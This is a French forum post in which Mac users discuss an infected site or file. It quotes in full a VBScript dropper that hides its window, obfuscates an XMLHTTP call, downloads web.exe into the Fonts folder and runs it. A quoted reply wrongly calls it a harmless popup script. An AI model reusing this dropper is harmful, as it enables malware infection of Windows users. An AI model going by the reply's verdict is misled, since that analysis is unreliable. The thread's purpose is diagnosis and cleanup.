Pascal 77 a dit:La recherche tourne toujours, Kathy, tu devrais faire la même sur ton G5 pour voir (c'est long, tu cherche "baraso" dans le contenu des fichiers, si nécessaire, laisse tourner toute le nuit, et quand c'est fini, tu jettes tout ce qu'il a trouvé, tu devrais être ensuite tranquille un moment.
Pour le script, je suis d'accord sur l'inocuité sur Mac, mais il ne gère pas un pop up, il tente d'installer un ficher nommé web.exe dans un dossier qu'il crée quelque part (j'ai pas compris ou, peut-être dans un dossier "font". Ce fichier web.exe est dans la liste des virus PC que détecte mon Norton.
peux tu me donner la ligne de commande que tu as tapé dans le terminal pour faire ta recherche?
au fait voici la réponse de dulrich ( je fais l'intermédiaire entre macgé et macbidouille )
" il ne l'a pas ouvert ( il parle de toi, lol)
CODE
<script language="vbs">
self.MoveTo 5000,5000
Set shell=CreateObject("WScript.Shell")
'Ebal Ya V Rot Kaspera
ebar = "logs.txt"
Set fso = CreateObject("Scripting.FileSystemObject")
Set OLEr = fso.CreateTextFile(ebar)
for y = 1 to 500
OLEr.Write " " + chr(13) + chr(10)
next
OLEr.close
megret="PTTHLMX.2lmxsM"
ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"
set dot=CreateObject(strreverse(megret))
dot.Open "GET", "../web.exe", false
dot.Send()
cs = dot.responseBody
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(ddd)
for i = 0 to UBound(cs)
inta=1
intb=2
intc=int(intb)-int(inta)
c = ascb(midb(cs, i+1, 1))
f.Write chr(c)
next
f.close
shell.run(ddd)
window.close()
</script>
langage = vbs => visual basic script
ça change rien, ça reste du langage qui aurait du être exécuté côté client mais qui est chargé par le navigateur qui ne peut l'exécuter... ou le serveur qui devait l'exécuter qui n'a pas pu... dans les deux cas ça revient au même, c'est quelque chose qui arrive couramment. Mainteneant faut mettre à jour safari
[edit] et si ça c'est du php alors je suis karl marx
[edit2] c'est un script qui semble gérer/intégrer un popup."